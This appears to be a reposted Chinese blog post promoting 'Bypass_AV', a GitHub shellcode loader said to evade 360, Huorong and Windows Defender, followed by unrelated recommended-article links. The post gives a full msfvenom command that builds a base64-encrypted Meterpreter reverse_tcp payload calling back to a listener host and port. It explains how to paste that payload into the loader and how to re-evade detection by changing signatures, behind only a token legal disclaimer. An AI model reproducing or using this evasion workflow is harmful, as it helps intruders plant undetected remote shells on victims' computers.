免杀ShellCode加载器 ,360、火绒、Windows Defender

渗透师老A · 公众号 · · 2022-12-12 10:10

正文

作者： Axx8

Bypass_AV msf免杀，ShellCode免杀加载器，免杀shellcode执行程序，360&火绒&Windows Defender

代码够简单，估计要不了多久就进特征库了，被杀了再去改几个特征码照样又可以免杀，作者的 github 保持更新，可以去瞅瞅。

项目地址： https://github.com/Axx8/Bypass_AV

2022年5月8日 测试可以免杀国内杀软 火绒&360及Windows DefenderWindows 10 64位 360&火绒&Windows DefenderWindows 7 64位 或以上操作系统应该都没问题（没有测试）

该项目仅供网络安全研究使用，禁止使用该项目进行违法操作，否则自行承担后果，请各位遵守《中华人民共和国网络安全法》！！！

代码未经过大量测试，如发现问题请提交 issue。

生成ShellCode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.100 lport=8080 --encrypt base64 -f c

注意：ShellCode 需要是64位的

将生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 处

注意：保留原始ShellCode 里的双引号 "

示例：

最终格式：

推荐文章

APPSO · 余承东谈华为 Pura X 定价/刘强东:不该用算法压榨最底层兄弟/腾讯发布 AI 推理模型混元 T1 正式版

14 小时前

小众软件 · RSS 订阅工具 Follow 发布 iOS 版本：Folo，无内购，完全免费

昨天

APPSO · 小米回应「工厂参观资格被炒至千元」/黄仁勋：英伟达是世界唯一的 AI 公司/Manus 国内产品完成登记

昨天

APPSO · 华为的新形态手机 Pura X ，要让小折叠撕下「美丽小废物」的标签

2 天前

小众软件 · 不限次数，一个超方便的浏览器 DeepSeek R1 671B 满血版方法

2 天前

iWeekly周末画报 · 从学徒到千亿超级富豪，他用一生谱写出香港商业的传奇范本

8 年前

红秀GRAZIA · 鹤立鸡群的过年玩法，权志龙也有份帮你一起玩

8 年前

刘晓博说楼市 · 刘晓博 | 5年后，深圳超越京沪？你又被忽悠了！

8 年前

经济学人集团 · 金融业“数据军备竞赛”有隐忧？ | 商论试读

8 年前

为你读诗 · 来相爱吧，为了这迷死人的爱情 | 「为你读诗」七夕合辑

7 年前